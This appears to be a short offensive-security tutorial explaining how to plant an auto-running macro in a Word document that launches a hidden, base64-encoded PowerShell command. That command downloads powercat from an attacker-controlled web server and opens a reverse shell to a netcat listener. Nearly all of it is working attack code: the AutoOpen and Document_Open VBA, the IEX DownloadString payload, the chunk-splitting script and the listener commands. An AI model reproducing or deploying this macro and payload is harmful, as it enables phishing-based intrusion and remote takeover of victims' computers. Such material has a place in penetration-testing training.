Leveraging Microsoft Word Macros for Reverse Shell

Published on June 5, 2025

This tutorial walks through embedding a malicious macro into a Word document, encoding a PowerShell payload, and serving it via a Python web server to establish a reverse shell.

1. Creating the Macro

Save the document as .doc or .docm. Go to View > Macros, name it MyMacro, and click "Create".

Sub AutoOpen()
    MyMacro
End Sub

Sub Document_Open()
    MyMacro
End Sub

Sub MyMacro()
    CreateObject("Wscript.Shell").Run "powershell"
End Sub

2. Encoding a PowerShell Payload

We’ll now encode a reverse shell using PowerShell Core (pwsh) to bypass special character issues.

kali@kali:~$ pwsh
PowerShell 7.1.3
Type 'help' to get help.

PS> $Text = "IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell"

PS> $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text)
PS> $EncodedText = [Convert]::ToBase64String($Bytes)
PS> $EncodedText

3. Splitting the Base64 in VBA

Use a Python script to split the encoded string:

str = "powershell.exe -nop -w hidden -enc JABjAG..."
n = 50
for i in range(0, len(str), n):
    print('Str = Str + "' + str[i:i+n] + '"')

Then update the macro:

Sub MyMacro()
    Dim Str As String
    Str = Str + "powershell.exe -nop -w hidden -enc JABjAG..."
    ' Continue with chunks...
    CreateObject("Wscript.Shell").Run Str
End Sub

4. Python Web Server

Host powercat.ps1 with Python3:

cd /path/to/powercat
python3 -m http.server 80

5. Listen for the Shell

Start Netcat listener:

nc -nvlp 4444

Once the document is opened and macros enabled, a reverse shell will connect back.

Related Articles